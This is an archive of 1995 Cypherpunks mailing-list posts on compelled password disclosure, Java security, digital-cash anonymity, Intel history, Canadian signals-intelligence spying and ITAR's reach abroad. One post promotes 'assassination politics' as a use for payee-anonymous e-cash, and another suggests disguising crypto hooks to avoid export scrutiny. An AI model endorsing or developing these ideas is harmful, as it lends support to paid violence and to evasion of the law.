>>> evidence. In a parallel fashion, provisions should be made for the
>>> power to order persons to submit any specified data under their
>>> control in a computer system in the form required by the
>>> investigating authority.
>>> ________________________________________________________________________

>> Is this 'what we would want'? It clearly means that one can be
>> ordered to reveal the password to encrypted data and punished by law
>> if one refuses.

MS> Forgive me if this point has already been raised, but couldn't an
MS> objection to such laws be based on the protection against
MS> self-incrimination?

MS> Maybe this all depends on whether the legal context is a civil or a
MS> criminal proceeding. If I'm being sued and they ask me at a
MS> deposition whether I did such-and-such, I can't take the Fifth (or
MS> can I?). But if I'm accused of murder, the police can't make me tell
MS> them where I've buried the knife. However, if I have a wall safe and
MS> they get a warrant to search it, can I be jailed for contempt if I
MS> don't give them the combination?

Well, IANAL, but yes, I believe that you can be. Or, worse, obstruction of justice. Especially if they cut it open and find that the knife was in the safe.
--
#include /* Sten Drescher */
To get my PGP public key, send me email with your public key and
Subject: PGP key exchange
Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3

From m5 at dev.tivoli.com Fri Nov 17 10:46:33 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Sat, 18 Nov 1995 02:46:33 +0800
Subject: Java & Netscape security [NOISE]
In-Reply-To: <9511161831.ZM14572@glacius.alias.com>
Message-ID: <9511171814.AA23432@alpha>

Frederick B. Cohen writes:

> This is baloney. When you work for Netscape or Sun and speak about your
> company's products, you are representing the company whether you
> disclaim it or not.

Baloney.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From rjc at clark.net Fri Nov 17 10:54:29 1995
From: rjc at clark.net (Ray Cromwell)
Date: Sat, 18 Nov 1995 02:54:29 +0800
Subject: Java & Netscape security [NOISE]
In-Reply-To: <9511170006.AA17075@all.net>
Message-ID: <199511171827.NAA26980@clark.net>

> When Postscript allows writing to files, most Web browsers
> become insecure - including Netscape, including HotJava. If the only
> commonly available postscript programs are insecure, the products have
> hooks designed to allow postscript to be used automatically to interpret
> programs from over the net, and servers commonly provide information in
> postscript format, the enabling technology (i.e., Netscape and Hot Java)
> is responsible for the vulnerability.

[This is my last response on this subject.]

This is a non-sequitur. Providing hooks for third-party add ons does not make Netscape responsible for damage done by third party products. If you believe this is true, find me a legal precedent for it. It doesn't make sense on a purely intellectual level.
If you produce a product that has the ability to be upgraded, and someone upgrades it with dangerous third party products, how can you control that? The only way to assure against it is to not allow upgrades of functionality except by your own company. This throws the whole idea of reusable software, device independence, and building "platforms" right out the window. It's the kind of logic that seeks to make bars responsible for drunk drivers. Indeed, Microsoft and Apple should be held responsible for dangerous "applications" that their computers can execute.

I don't know anyone who has a postscript viewer configured in Netscape and I suspect the vast majority of people using Netscape don't even have the knowledge to do it. Your comments are not significant and the threat is minor. If you had actually exposed a threat to the JavaVM/Classloader model, which might be installed on a sizable portion of browser machines, you might have a point. But since your postings have made it clear that you haven't read or understood the Java papers (besides the white paper), nor have you looked at the actual implementation, your comments are essentially meaningless.

You seem fixated on what is, a semantic argument about what "safe" or "secure" means. (e.g. your comments on MD5) You expect these words to have a binary meaning. Either something is safe/secure or it isn't. The world is a lot more fuzzy than that.

-Ray

From jimbell at pacifier.com Fri Nov 17 11:09:56 1995
From: jimbell at pacifier.com (jim bell)
Date: Sat, 18 Nov 1995 03:09:56 +0800
Subject: e$: Come aaaannnndddd Get it!
Message-ID:

>> I will as soon as someone comes up with a _fully_ private digital
>> cash system and starts using it for something. As I understand it, Chaum's
>> ecash system is not one (i.e., non-privacy to the sender and of amounts to the
>> bank). If I'm incorrect, please tell me and I'll set up an account with MTB
>> immediately (if there's a text-based interface).
>
> ecash provides full payor anonymity. Payee anonymity is
>currently not possible, but that is being worked on.
>
> If you used ecash to pay for a c2.org account, neither I nor
>the bank would be able to trace the payment into the c2.org account to
>an actual account at mark twain bank.
>sameer Voice: 510-601-9777
>Community ConneXion FAX: 510-601-9734

If you've been following my idea, "assassination politics," you know that there is an excellent use for payee-anonymous digital cash. It seems to me that this should be possible, within limits, if the potential payee could generate a "blinded" note to be delivered to the payer by anonymous means. The payer could get the note certified by the bank, possibly given an extra "blind" if necessary (is this possible? Desirable? Why not?) and then the resulting still-blinded but certified note is posted (in encrypted form, I supposed) to the 'net so that only the payee can decrypt and unblind it.

From frantz at netcom.com Fri Nov 17 11:34:04 1995
From: frantz at netcom.com (Bill Frantz)
Date: Sat, 18 Nov 1995 03:34:04 +0800
Subject: credit card conventional wisdom
Message-ID: <199511171905.LAA27110@netcom4.netcom.com>

At 15:22 11/16/95 -0500, Arley Carter wrote:

>3. I'm getting tired of seeing posts this list about what is more dangerous
>cyberspace or restaurantspace. Let's focus on the real mechanics of how
>the ground rules of credit card clearing will operate in cyberspace. The
>credit card consortiums can advance the cause of electronic commerce by
>stating in unambiguous terms what their views are of these ground rules.
>Developers, cardholders and merchants can then make a judgement on whether
>those risks are acceptable to each party respectively.

I agree. I doubt we can completely eliminate the risk by technical fixes. I do think we may be able to reduce the risk below what it is in non-cyberspace commerce. (e.g. phone orders and in-person card presentation).
If we can do that, and a significant part of commerce moves to cyberspace, then we can see a reduction in the fraud premium that we all pay (no matter who "officially" pays for it).

While cash-like instruments will be an important part of cyberspace, I think that credit arrangements may be more important. In non-cyberspace commerce, almost all big-ticket purchases are made with time-payment credit. Whether the total of the "candy bar" transactions will exceed the total to the big-ticket transactions, I don't know. Certainly if we are dealing with tangible goods, shipping costs encourage large orders.

Bill

-----------------------------------------------------------------
Bill Frantz Periwinkle -- Computer Consulting
(408)356-8506 16345 Englewood Ave.
frantz at netcom.com Los Gatos, CA 95032, USA

From smithmi at dev.prodigy.com Fri Nov 17 12:21:49 1995
From: smithmi at dev.prodigy.com (Michael Smith)
Date: Sat, 18 Nov 1995 04:21:49 +0800
Subject: COE Recommendation No. R (95) 13
Message-ID: <199511171958.OAA30121@tinman.dev.prodigy.com>

>
>>Forgive me if this point has already been raised, but couldn't an
>>objection to such laws be based on the protection against
>>self-incrimination?
>
>There is no such right in most (if not all) european countries. In
>France there is not even the presumption of innocence.

[Further depressing news deleted]

Yes, this was my understanding. I guess the point I was groping toward was that while we could hardly expect that our rights vis-a-vis electronic privacy would be any _better_ than our rights in obviously analogous non-electronic areas, they might well be worse; it's important to be clear, and to make clear, that what rights we have left have obvious extensions to our net.activities, and try to prevent the thin end of the wedge from being inserted in our portion of the perimeter.
Of course, this only applies to the set of people who live in countries where people _have_ any rights, and as Phill implies, that may soon be the null set.

--Michael Smith
smithmi at dev.prodigy.com

From perry at piermont.com Fri Nov 17 12:59:47 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 18 Nov 1995 04:59:47 +0800
Subject: No Privacy Right in UK ?
In-Reply-To:
Message-ID: <199511172025.PAA13462@jekyll.piermont.com>

Could you please explain what this has to do with cryptography?

"James M. Cobb" writes:
>
> 11 16 95 The Electronic Telegraph runs a newsstory headed
>
> Doorstep polish researcher was whiplash injuries spy
>

From smithmi at dev.prodigy.com Fri Nov 17 13:06:49 1995
From: smithmi at dev.prodigy.com (Michael Smith)
Date: Sat, 18 Nov 1995 05:06:49 +0800
Subject: COE Recommendation No. R (95) 13
Message-ID: <199511172019.PAA30181@tinman.dev.prodigy.com>

>MS> However, if I have a wall safe and
>MS> they get a warrant to search it, can I be jailed for contempt if I
>MS> don't give them the combination?
>
> Well, IANAL, but yes, I believe that you can be. Or, worse,
>obstruction of justice. Especially if they cut it open and find that
>the knife was in the safe.

So presumably the same would apply to the password that unlocks my PGP private key. But there's an interesting twist. Once they open up the wall safe, they can see for sure what is and isn't in it. This ain't necessarily so for an encrypted file. Suppose my software has the fiendish sophistication to disgorge different keys depending on what password was given, and different pieces of cleartext depending on what key was used. (Again, I apologize if this notion has already been extensively discussed.) Is there a way to set it up such that the cops couldn't be sure -- even using a logic analyzer -- that I hadn't given them the complete set of keys, so as to read all the cleartexts in the file?
Assume that cyphertext files are guaranteed to be larger, by some random factor, than the sum of all the cleartexts in them, so the mere fact that a smaller quantity of cleartext was disgorged than cyphertext supplied would tell them nothing.

I guess this is a kind of steganography, isn't it? Or at least something similar -- the point would be that they couldn't tell genuine cyphertext from camouflaging noise, without the key that tells them where to look.

Which brings us, in turn, to the bottom line: the only things we can be certain the bad guys _won't_ do, are the things they _can't_ do.

--Michael Smith
smithmi at dev.prodigy.com

From attila at primenet.com Fri Nov 17 13:13:07 1995
From: attila at primenet.com (attila)
Date: Sat, 18 Nov 1995 05:13:07 +0800
Subject: Corrections about Bob Noyce and Intel
In-Reply-To:
Message-ID:

On Fri, 17 Nov 1995, Timothy C. May wrote:

> At 4:55 PM 11/17/95, attila wrote:
>
> > 2. most were pioneers: a specific example is Bob Norris who walked
> > out of a Fairchild board meeting being rejected for his
> > eighth try at replacing Germanium because the first seven had
> > failed. A couple of VCs, among them Arthur Rock and Bob Perring
> > said: "...we believe you, let's try silicon..." and we have Intel.
>

a sign of getting old: blowing names. yes, it is Noyce.

> Bob Noyce was already making silicon devices at Fairchild. The "planar
> process" was developed by him in the late 50s. It is not the case that
> Fairchild was stuck making germanium, nor that Intel was the first to use
> silicon. I could go on about the actual history, but this is far from the
> themes of this list, and many books cover the history very well.
>
> What Intel pioneered the development of was _silicon-gate MOS_, where the
> aluminum gates of traditional silicon devices is replaced with polysilicon
> gates. Intel did this by hiring the silicon-gate gurus from Fairchild
> (Vadasz, Grove, Faggin, etc.).
>

you are probably correct, I did not follow the actual technology. I do know that from the financial point of view, there had been too many failures to justify another large project --yes, that could have been the silicon-gate MOS theory. But there certainly was a parting of the ways over funding, to the probable good of the industry since Fairchild was already very stodgy. You do need a new, ambitious venture to exploit a new technology --one with a single goal, and Intel certainly was that vehicle.

The closest I got to Fairchild Semiconductor was when I was consulting as a hatchet man to "save" another, newly acquired, Fairchild division which had a desperate need for 100K ECL parts which were not really on the market in 1977. The labs in the old building 2 were in pitiful shape, and that is where 100K ECL had been ostracized --the new division's product was hot on the list of then current Fairchild president, Cronin, who suffered through my presentation of why I needed $1M plus the 100K lab and fab upgraded --funding for both was the same day, not the usual 3-6 months. Nice corporate jet at the time.... :) and, yes, both projects were _very_ successful.

> > But, who drives Intel today? --Grove, who is labelled as the
> > founder. Grove made the _business_ -the brains have been
> > forgotten. Norris was the darling of the VCs for a couple years
> > until they figured he couldn't spot a _financial_ success.
>
> Grove remains a technologist--I studied semiconductor physics from his
> wonderful 1967 book, "The Physics and Technology of Semiconductor
> Devices"--and the group that leads Intel is highly technical. Gordon Moore
> remains connected, materials scientist Craig Barrett (who hired me into
> Intel in '74, ironically) is next-in-line to be President, Gerry Parker is
> a top technologist, and so on.
>

Grove _was_ a technologist, but his current competitive tactics may have been the tutor for Bill Gates --or is the other way around?
:) since Bill is the most effective and feared, even by government, of competition by terror tactics ever seen --beats even Cornelius Vanderbilt who tried to contain Edison so his gas businesses would not suffer --CB _financed_ Edison and then tried to block Edison --who then essentially gave NYC the downtown power station, building it in defiance of CB.

But, even if Edison was the inventor, he was not a visionary: he had Tesla, who already had an AC motor, in his employ in the 1880s; they parted as Edison would not budge off DC and Tesla sold his AC Technology to George Westinghouse who had a great deal of money from his air brakes. When Tesla received the Niagara Falls power generator contract, DC was history and the huge generators Tesla designed are still running at the base of the falls --90+ years!

The same analysis can be applied to Bob Noyce v. Andrew Grove --Andrew Grove may have been an engineer, but he also became a visionary, as did Bill Gates.

I have not seen, or had the pleasure of seeing, Gordon Moore for at least 10 years. Yes, he is a technologist; AND, he is a gentleman. I do not know Craig Barrett. A Barrett presidency may change Intel's voracious competitiveness, or it may not.

> As to Bob Noyce being the "darling of the VCs for a couple of years until
> they figured he couldn't spot a _financial_ success," I should just let
> that one pass. Noyce of course has been dead for several years. When he was
> alive, though, he "spotted" several financial successes.
>

your history is generally better than mine, Tim, but I will differ on that point. in the 70s and 80s I was consulting to 3-7 of the heavy players at that time in the Sandhill group plus the old guard downtown on high-tech ventures --I always figured I would get the call when their fear exceeded their greed. :) (and so stated by one of their own).

you may be correct that Bob Noyce hit a couple of winners, but, overall he did just the opposite.
as two of the heavies stated over lunch one day, "...having Bob Noyce's recommendation became the kiss of death in this town..."

Now, granted, the VCs have their own point of view of what a financial success is --after all, they base their views on an investment strategy for 10 deals: 1 real winner (not necessarily a NetScape or an Intel, but at least go public with a bang), 3 make decent profit, 3 investment returned (or most of it), and 3 dead, or close to dead, losses.

My objection to the VC financing strategy was that they also took personal notes from the startup team and selectively enforced them, usually on the pioneers and not the president and comptroller they installed as part of the deal; and they have been known to take homes....

Today's VC is a far cry from John D. Rockefeller who was vilified in his day for his business practices --John D. took 10%, not 51% or more plus personal notes.

BTW, John D. was the first "big" anti-trust case in the U.S. Ohio drove him out of Cleveland to NJ with their anti-trust actions in 1890 (or thereabouts) and the U.S. under Teddy "Rough Rider" Roosevelt broke him apart nationally in 1909 for his slash and burn tactics. Where is Teddy when we need him for Microsoft, not the awestruck Bubba we have as commander and chief. I should remember more about John D. and anti-trust than I do, but it is over 30 years since I wrote my senior thesis at Harvard on regulation of monopoly. --and age is setting in! :)

Yes, I know you are retired --hopefully happily with a pension. consultants with blood on their hatchets make few friends, and the terms of getting old are more like time involuntarily on your hands in So CA's empty economy.

the hell you say, it's more like one big study and learn time! Knowledge was and still is power! as long as we have cryptography to protect it.

Dr.
Daniel Flickinger

> --Tim May
>

From froomkin at law.miami.edu Fri Nov 17 14:01:58 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Sat, 18 Nov 1995 06:01:58 +0800
Subject: COE Recommendation No. R (95) 13
In-Reply-To: <199511171958.OAA30121@tinman.dev.prodigy.com>
Message-ID:

sorry, but there is a right to remain silent in Europe:

[quoting from footnote 360 (whatsamatter you didn't get that far?) of my Clipper paper:]

The European court of Human Rights recently ruled that the right to remain silent is guaranteed under the European Convention on Human Rights (formerly known as the Convention for the Protection of Human Rights and Fundamental Freedoms), Nov. 4, 1950, art. 6(1), 213 U.N.T.S. 221. See Funke v. France, 256 Eur. Ct. H.R. (ser. A) at 8 (1993) (holding that Article 6(1) of the European Convention on Human Rights guarantees the right against self-incrimination); Ying H. Tan, Use of DTI Interviews Unfair, INDEPENDENT (London), Sept. 30, 1994, at 30 (reporting the decision of the European Commission of Human Rights in Saunders v. United Kingdom).

On Fri, 17 Nov 1995, Michael Smith wrote:

> >
> >>Forgive me if this point has already been raised, but couldn't an
> >>objection to such laws be based on the protection against
> >>self-incrimination?
> >
> >There is no such right in most (if not all) european countries. In
> >France there is not even the presumption of innocence.
>
> [Further depressing news deleted]
>
> Yes, this was my understanding. I guess the point I was groping

A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law | froomkin at law.miami.edu
P.O. Box 248087 | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.
From anonymous-remailer at shell.portal.com Sat Nov 18 06:07:15 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sat, 18 Nov 95 06:07:15 PST
Subject: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV)
Message-ID: <199511181405.GAA10722@jobe.shell.portal.com>

On Fri, 17 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> > Hmm, actually the news tape is reading a little strange here in Canada.
> > Not AP, or REUTERS, but simply the Canadian Press newswire.

[snip]

> Taking three successive news stories from three days ... (press stories,
> I've since pulled for my own reference) and pasting them together to
> indicate some type of Machiaevellian?? (sp) exercise is simply "not done."

I still feel such a sense of violation with what LD did, such an utter sense of helplessness at the character assassination I've suffered at his hands, that I feel that I must take some token action to "set the record straight". Something which clears my name.

Here is the TRUE unedited story for the list which Deitweiler felt he had to TWIST to the nth degree. His attempt at making mountains out of mole hills will not succeed with this one. I won't have him attack me, and attack everything I'm trying to achieve on this list, through his games.

It's a non-starter from the get go, LD.

Here's what was truly written ... let the list decide for itself.

COMMUNICATIONS SECURITY ESTABLISHMENT

Canada spied on allies: ex-agent

Top secret security agency accused of eavesdropping on South Koreans by former analyst

The Canadian Press

TORONTO Canada's electronic espionage agency has spied on friendly countries such as South Korea, Mexico and Japan despite Ottawa's denials, a former agent has told CTV News.

"I have lived with this information for so long and I just think that it is time that Canada knows what CSE is doing," Jane Shorten said in a report for broadcast late Sunday.
Shorten, 38, worked as an analyst from 1986 to 1994 -- when she was laid off -- for the Communications Security Establishment (CSE), CTV reports. A separate entity from the better known Canadian Security Intelligence Service, CSE can be described as a technological peeping tom. It specializes in electronic espionage, monitoring radio and other transmissions for useful information. The Soviets and their allies were once the prime targets of such surveillance, but after the thaw in the Cold War, CSE shifted its attention to friendly countries, Shorten told CTV. The agency spied on Canada's allies and trading partners, eavesdropping on friendly embassies, consulates, diplomats in Canada and around the world, she said. Ottawa denies it. "Countries like Canada have understandings that they don't carry out these activities against each other, " Solicitor General Herb Gray said earlier this year in response to claims that the U.S. Central Intelligence Agency had spied on the Japanese delegation during auto trade talks in Geneva. Replies Shorten: "He does not know what's going on because CSE is certainly doing that ... I spied on the (South) Korean government for the Canadian government." CSE is part of the Defence Department but Shorten insists senior officials at the Foreign Affairs Department were fully aware of its activities and anxious for its information. "I know my reports went to the Ministry of Foreign Affairs," Shorten told CTV. "My reports were classified as Top Secret Umbra and that's as high as you can get, and these people were cleared to get that kind of information." Shorten, once described by a superior as a gifted intelligence analyst, told CTV she was aware her revelations could result in prosecution under the Official Secrets Act but felt the risk of prison was worth it. "I feel so strongly that it's time that people learned what CSE is all about," she said. 
From jimbell at pacifier.com Fri Nov 17 14:46:12 1995
From: jimbell at pacifier.com (jim bell)
Date: Sat, 18 Nov 1995 06:46:12 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID:

>On Thu, 16 Nov 1995, Scott Brickner wrote:
>>
>> You'd need a program which not only *accepted* the additional parameter,
>> but also *needed* the second parameter. I confess I have some difficulty
>> thinking of one.
>
>It's not too hard to think of a compression scheme that needs extra
>information to be passed from client to server; the obvious example is
>some sort of dictionary compression with external dictionaries (can be
>very effective for short messages where LZW etc never get a chance to get
>going).
>
>Another, more likely case, is where the object could have been compressed
>by several schemes, and a scheme ID is needed to determine which
>algorithm to use.
>
>The real issue would appear to be intent, though. If it's obvious that
>the real intention for the hook is to allow encryption to be added,
>the State department can jump on it.

I'm not a programmer, but it seems to me that if the goal is to minimize the "obviousness" of the provision for cryptography, the calling program could call the called program (which might be an encryption program, maybe not) and ask for a text header that is to be listed in a Windows-type window. Thus, the calling program would not have any references to "encryption" or "key" in its program or documentation; it would get that the first time it calls the called program.

BTW, one function which obviously needs an additional argument to work is a CRC program, in which the particular polynomial to be used must be specified. And I guess that a CRC is basically the same type of thing as a hash function, too.

From futplex at pseudonym.com Fri Nov 17 14:47:46 1995
From: futplex at pseudonym.com (Futplex)
Date: Sat, 18 Nov 1995 06:47:46 +0800
Subject: e$: Come aaaannnndddd Get it!
In-Reply-To:
Message-ID: <199511172156.QAA15802@opine.cs.umass.edu>

jim bell writes:
[re: payee anonymity]
> It seems to me that this should be possible, within limits, if the potential
> payee could generate a "blinded" note to be delivered to the payer by
> anonymous means. The payer could get the note certified by the bank,
> possibly given an extra "blind" if necessary (is this possible? Desirable?
> Why not?) and then the resulting still-blinded but certified note is posted
> (in encrypted form, I supposed) to the 'net so that only the payee can
> decrypt and unblind it.

This sounds like a version of "Hey, I'll pay you $10, if you give me a ten dollar bill first." As I understand your protocol, Bob gives Alice an enote, then Alice gives Bob an enote. Alice isn't paying Bob in any meaningful sense, since Bob ends up with the same amount of e$ with which he started. Perhaps you could clarify what you meant.

-Futplex
"I'm not touched, but I'm aching to be...."

From froomkin at law.miami.edu Fri Nov 17 14:47:49 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Sat, 18 Nov 1995 06:47:49 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To:
Message-ID:

[sorry for the delay, things are busy here, and apologies too for the length of this thing...]

Misunderstanding, piled on misunderstanding, piled on disagreement. I'll try to focus on the big points, and let the small stuff slide. Let the record show that Prof. Junger and I still agree on lots of stuff that's outside this debate. I wasn't trying to attack him before, and I'm not trying to start a flamewar now.

Main point for the busy: Claims that the US government could apply the ITAR to 2 foreigners abroad and get a US court to buy it are, IMHO, unfounded.

On Thu, 9 Nov 1995, Peter D. Junger wrote:

[...]
> seem to have two different areas of disagreement: (i) whether the > ITAR's provisions relating to cryptographic software apply to foreign > persons who disclose (or transmit) cryptographic software to another > foreign person without the United States [....the Itar is unconstitutional....] Yes. > > Now Mr. Froomkin says: > > In short, in this particular case the ACEA, and by extention the > ITAR, doesn't "say what it says" it "says what it must mean". > > (And I dare him to make that assertion in the faculty lounge at Miami > when some of the more critical and analytically inclined members of > the Miami law faculty are present.) I would take this as an admission I would say it anywhere. Some days I would even claim to be one of those people.., > that the ACEA and the ITAR does say what it says (even if it must mean > something else) were it not for the fact that--and this was my ``ultra > vires'' point--that the ACEA doesn't say it. > > (In discussing the quoted passage I am assuming that ``extention'' > must mean ``extension'' and that it is not used as the opposite of > ``intention'', if only because I don't know what the latter would be. > But on the other hand the only dictionaries I have to hand are the COD > and the on-line version of Webster's Collegiate.) > > The AECA doesn't contain any definition of ``export'' whatsoever; the > whole issue that we are discussing turns on the interpretation of what > the ITAR says when it defines ``export'' as including: > > Disclosing (including oral or visual disclosure) or transferring > technical data to a foreign person, whether in the United States or > abroad .... > > Now Mr. Froomkin seems to be contending that this language must be > interpreted as it would be interpreted by some sort of neo-Platonic > court (probably sitting in Rawl's original position by designation), > which he calls ``any court''. The contention is: Nope. Never said it, didn't mean it. I mean a good ol' garden variety US federal court. 
> any court construing the ACEA would inevitably read the prohibition > on "exporting" to a foreign person as not applying where the nation > lacks jurisdiction. > > Now it was my argument--which Mr. Froomkin helpfully calls an ``ultra > vires'' argument--that any court reading the ACEA would notice (i) Here's a misunderstanding (for which I'm happy to take full responsibility). What I meant by the "ultra vires" point is this: There are lots of ways in which an agency action can be struck down by the courts. Two of them are: 1) The agency interpreted the statute correctly, but the statute was unconstitutional -- beyond Congress's powers under the constitution. 2) The agency interpreted the statute Incorrectly, and tried to do something beyond the powers delegated to it by congress (the nice thing about this is that one doesn't even reach the issue of whether Congress could, in theory, have delegated the power in question). > that there is no language in that act defining ``export'' and (ii) > that ``export'' does not mean disclosing, or even transferring, > information (which is what cryptographic software is) and (iii) that, > in consequence, the Office of Defense Trade Controls exceeded its > congressionally granted authority, and therefore its constitutional > authority, when it came up with the perverse provision that is at > issue here. But that is the subject of my other, as yet unwritten, > message. That's what I meant by my ultra vires assertion. Type (2) above. So we agree in a sense as to what this problem is -- but I call this a case of an agency misconstruing the statute, not a "separation of powers" problem. Let's assume, for the argument, that I'm wrong and that the agency read the statute reasonably (note under Chevron it doesn't have to read it "right" just reasonably). Does the agency read the statute to apply to two foreigners talking on the beach at Calais? No it does not. Did Congress intend the statute to be applied to the two foreigners? 
No evidence that it did. Would or should a court read the statute to apply to two foreigners etc. in the absence of a clear direction from Congress to that effect? No. Why not? Two main reasons. One is the one you identify:

> Now I take it that Mr. Froomkin's contention turns on the claim that
> Congress lacks jurisdiction under international law to pass a
> statute--or authorize a regulation--that makes it a crime for a
> foreign person to transmit something to another person when both of
> them are outside the United States. So as to avoid the other

The other one is that even if Congress had the jurisdiction, the court would be reluctant to read the statute that way, with the implications for foreign relations, comity, etc etc without clear directions to do so. And if you think the court would just formalistically follow the words of the statute, see eg Church of the Holy Trinity, 143 US 457 and its progeny.

> constitutional and ultra vires and so on issues, let us assume that
> Congress were to amend the ACEA to make it a crime ``to transfer a
> cryptographic device to a foreign person within the United States or
> abroad without first obtaining a license or a waiver of jurisdiction
> from the Office of Defense Trade Controls.''
>
> And now assume that someone, F, who is a foreign person and who has
> never been in the United States transfers a cryptographic device that
> was not made in the United States or by a United States company to
> another foreign person who has never been in the United
> States. And now assume that F does come to the United States on a
> holiday and that he is arrested and indicted for violating the AECA in
> that he did transfer a cryptographic device to a foreign person.
>
> The first thing to notice is that the indictment is not defective.
> The only defense--since it is the only one that we are interested in
> and we control the hypothetical--is: ``but that was in a foreign
> country'' and therefore the United States has no jurisdiction under
> international law (or under something) to treat F's actions as a
> crime.
>
> So the defense moves to dismiss the indictment on those grounds. And the
> prosecution stipulates that the acts charged occurred in a foreign
> country, that F is a foreign person, etc.
>
> On those facts I would hope that the court would construe the statute
> as not covering F's actions outside the United States and would dismiss
> the indictment, but--considering that the statute specifically says it
> applies both within the United States and ``abroad''--I am not nearly
> as sanguine as Mr. Froomkin is. But let us assume that the indictment
> is dismissed.

I cannot imagine that the court would do anything but dismiss on these facts.

>
> And now the hypothetical provision in the ACEA is again amended by
> congress to make it a crime ``for (i) a United States citizen to
> transfer a cryptographic device to a foreign person within the United
> States or abroad or (ii) a foreign person to transfer a cryptographic
> device to a foreign person within the United States or abroad, without
> in either case first obtaining a license or a waiver of jurisdiction
> from the Office of Defense Trade Controls.''

Note that now we are more explicit than in the ACEA.

>
> And now assume that F', who has never been in the United States
> transfers a cryptographic device to a foreign person and thereafter
> comes to the United States and is arrested and indicted for violating the
> hypothetical provision of the ACEA. It would seem to me that there is
> no way that any but the most willfully wrong-headed court (and there
> are, I admit, such courts) would construe the hypothetical provision
> as not covering F's actions, since it does so clearly cover those
> actions.
> I mean that there is no way that the court can get away with
> concluding that it does not mean what it says.
>
> So what can F' do now? Well, he could try to raise the claim that the
> lack of ``jurisdiction''--which is the justification for Mr. Froomkin's
> ``any court'' construing the ITAR's actual provisions would not apply
> to F or F'--is a ground for dismissing the indictment.
>
> But how can he raise that point? He can't very well deny that the
> court has jurisdiction over his person--he's sitting in the court with
> shackles on--and he can't get away with claiming that the court
> doesn't have jurisdiction to try him for violating the ACEA.
>
> So it would seem that F's only hope would be to move to dismiss the
> indictment on the ground that to continue the prosecution would be to
> deny him due process because the United States lacks jurisdiction
> under international law.

There are a number of other arguments he could make. E.g. denial of due process for lack of notice. Unconstitutionality of the statute as exceeding the powers of congress as a violation of international law. A weaker argument would be an analogy to the ex post facto clause -- now the government seeks to apply its laws to him after the fact. I do not think that the Nuremberg precedent would be contrary, since the claim of the US there was that some laws of man and nations are always in force everywhere. Restrictions on crypto exports do not fall in that class.

>
> Now I am no expert in this area, but I would be surprised if the
> courts would recognize this as constitutional defense. As I understand
> it from talking with somebody here at CWRU who is knowledgeable, the
> courts of the United States tend to defer in such cases to Congress

A vast and unhelpful oversimplification. What do you mean by "such cases"?
Criminal prosecutions of US citizens for messing in foreign policy is one thing; criminal prosecutions of foreigners for acts that have foreseeable effects here is another thing; criminal prosecutions on the facts above is a whole different thing.

> and the executive--when they are in agreement, as they would be in our
> hypothetical--and principles of international law count for little.

It is certainly true that as Justice Jackson put it, the powers of those branches are greatest when they agree. But the constitution trumps all.

>
> So F' will ``inevitably''--to use Mr. Froomkin's word--be convicted of
> the crime of delivering a cryptographic device to a foreign person
> outside of the United States.

I do not agree. See above.

>
> Now let's get back to the ITAR as it is actually written. In an actual
> criminal action brought against a foreign person who is accused of
> disclosing cryptographic information to a foreigner outside the United
> States--not that I think such an action will ever actually be
> brought--the government can point out to the court the facts that I
> have just discussed, so the court will be aware that there is no
> constitutional provision requiring the dismissal of the indictment, even
> if the indictment is contrary to international law. And a real court,
> as opposed to Mr. Froomkin's ``any court'' might in those
> circumstances feel free to determine that the ITAR means what it says.
> (That's just common sense.)

But no. First there are the constitutional arguments. Then there is the idea that we interpret the statute to avoid the constitutional and international problems. Then there is the problem that there are no grounds to think that Congress ever intended to reach foreigners in such cases (and Holy Trinity Church, 143 US 457 (1892) still gets cited (despite its anachronistic view of religion)).
>
> And, were the government ever to bring such a case, it would argue,
> and I think that it would convince a lot of real judges, that the
> criminal action does not violate international law because the United
> States is protecting its own economic interests by prosecuting foreign
> persons who disclose cryptographic information to other foreign
> persons outside the United States. The government's lawyer will
> argue:
>
>    Judge, the United States is in a real bind. It is absolutely
>    necessary for our national security that we forbid the export of
>    cryptographic software. But, on the other hand, as those
>    Cryptopunks keep pointing out, we are destroying our computer
>    industry by enforcing the ITAR against American companies. So the
>    only solution is to apply the ITAR against foreigners as well so
>    that the American computer industry will have a levelled--I mean a
>    level--field to play upon. And the anti-trust cases make it
>    absolutely clear that the United States does have jurisdiction to
>    enforce its laws against foreign criminals who break those laws
>    outside of the United States when their crimes have a negative
>    effect upon the economy of the United States.
>
> I am afraid that most federal district court judges would buy that
> argument, and I am not even sure that Mr. Froomkin's ``any court''
> wouldn't buy it.
>

I think many district judges, most appellate judges, and almost every supreme court justice would at least reject, if not laugh at, that argument. The trend is away from assertions of jurisdiction over foreigners without minimum contacts, e.g. Asahi (sp?).

> And, in any case, if such a criminal case were to be brought, the
> government would almost certainly be able to allege additional facts
> to help justify the claim that the US does have jurisdiction over the
> matter under international law.

I'm sorry, but everything that follows the line above is irrelevant.
